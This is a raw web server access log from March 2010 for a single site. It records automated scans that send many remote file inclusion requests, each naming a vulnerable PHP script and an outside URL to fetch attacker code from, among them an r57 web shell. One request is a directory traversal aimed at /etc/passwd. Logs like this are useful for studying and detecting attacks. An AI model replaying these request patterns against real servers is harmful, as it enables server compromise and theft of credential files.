118.129.166.154 - - [11/Mar/2010:06:53:02 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:02 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:05 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:05 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:05 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:55 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:55 -0800] "GET /logs/access.log%20%20//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:55 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:55:51 -0800] "GET /logs//bbs/write_update.php/?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:55:51 -0800] "GET /logs/access.log//bbs/write_update.php/?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:55:51 -0800] "GET /bbs/write_update.php/?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:56:40 -0800] "GET /logs/access_100121.log//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:56:42 -0800] "GET /logs/access_100121.log//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.16.237.166 - - [11/Mar/2010:06:56:46 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.16.237.166 - - [11/Mar/2010:06:56:46 -0800] "GET /bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.16.237.166 - - [11/Mar/2010:06:56:46 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.90.47.134 - - [11/Mar/2010:06:57:38 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://goldenpost.co.kr/AsaMall/image/code.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.90.47.134 - - [11/Mar/2010:06:57:38 -0800] "GET /write_comment_update.php?board_skin_path=http://goldenpost.co.kr/AsaMall/image/code.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.90.47.134 - - [11/Mar/2010:06:57:38 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://goldenpost.co.kr/AsaMall/image/code.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:06:58:25 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:06:58:25 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:06:58:25 -0800] "GET /logs/access_100225.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:06:58:25 -0800] "GET /logs/access_100224.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:06:58:30 -0800] "GET /logs/access_091228.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:58:39 -0800] "GET /logs/access.log%20%20//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:58:39 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:58:39 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:06:59:29 -0800] "GET /logs/access_100121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:07:00:29 -0800] "GET /logs/access_100225.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.118.111.5 - - [11/Mar/2010:07:00:32 -0800] "GET /logs/access_100224.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xavanteambiental.com.br/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.200.145.254 - - [11/Mar/2010:07:07:36 -0800] "GET /http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.hellionindustries.com"
69.90.47.134 - - [11/Mar/2010:07:08:59 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://goldenpost.co.kr/AsaMall/image/code.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:09:56 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:09:56 -0800] "GET /logs/access_091228.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:09:56 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:10:05 -0800] "GET /logs/access_091228.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:10:05 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:10:06 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:10:17 -0800] "GET /logs/access_100121.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:10:30 -0800] "GET /logs/access_100121.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:12:07 -0800] "GET /logs/access.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.122.197.10 - - [11/Mar/2010:07:12:28 -0800] "GET /logs/access.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:42 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:42 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:42 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:45 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:45 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:45 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:57 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:57 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:20:57 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:22:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:22:15 -0800] "GET /logs/access_100121.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:22:15 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:22:42 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:22:42 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:22:42 -0800] "GET /logs/access_100121.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:22:47 -0800] "GET /requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:22:50 -0800] "GET /logs/access.log//requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:22:52 -0800] "GET /logs//requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:08 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:08 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:08 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:25 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:25 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:25 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:30 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:30 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
210.179.177.167 - - [11/Mar/2010:07:23:30 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:07:24:15 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:07:24:15 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:07:24:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:24:27 -0800] "GET /appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:24:27 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:24:27 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:24:36 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:24:36 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:24:36 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:24:47 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:24:47 -0800] "GET /logs//appserv/main.php?appserv_root=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:07:24:47 -0800] "GET /appserv/main.php?appserv_root=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
122.200.145.254 - - [11/Mar/2010:07:25:29 -0800] "GET /logs/access.log/http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.hellionindustries.com"
122.200.145.254 - - [11/Mar/2010:07:25:30 -0800] "GET /http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.hellionindustries.com"
122.200.145.254 - - [11/Mar/2010:07:25:30 -0800] "GET /logs/http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.hellionindustries.com"
69.90.47.134 - - [11/Mar/2010:07:25:55 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://goldenpost.co.kr/AsaMall/image/code.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:07:26:10 -0800] "GET /logs/access.log/?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:07:26:10 -0800] "GET /?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:07:26:10 -0800] "GET /logs/?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:07:27:22 -0800] "GET /logs/access.log/?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:07:27:22 -0800] "GET /logs/?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.47.237.17 - - [11/Mar/2010:07:27:22 -0800] "GET /?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:07:27:38 -0800] "GET /logs//appserv/main.php?appserv_root=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:07:27:38 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv_root=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:07:27:38 -0800] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:07:29:04 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:07:29:04 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
165.132.30.11 - - [11/Mar/2010:07:29:04 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:07:30:26 -0800] "GET /logs/access_090901.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:07:30:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.250.124.252 - - [11/Mar/2010:07:30:26 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
58.230.162.220 - - [11/Mar/2010:07:30:31 -0800] "GET /logs/access_100121.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:07:34:19 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:07:34:19 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:07:34:22 -0800] "GET /logs/access_100224.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:07:34:38 -0800] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.250.255.243 - - [11/Mar/2010:07:35:53 -0800] "GET /logs/access_100224.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:07:37:27 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.dangno.co.kr//bbs/data/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
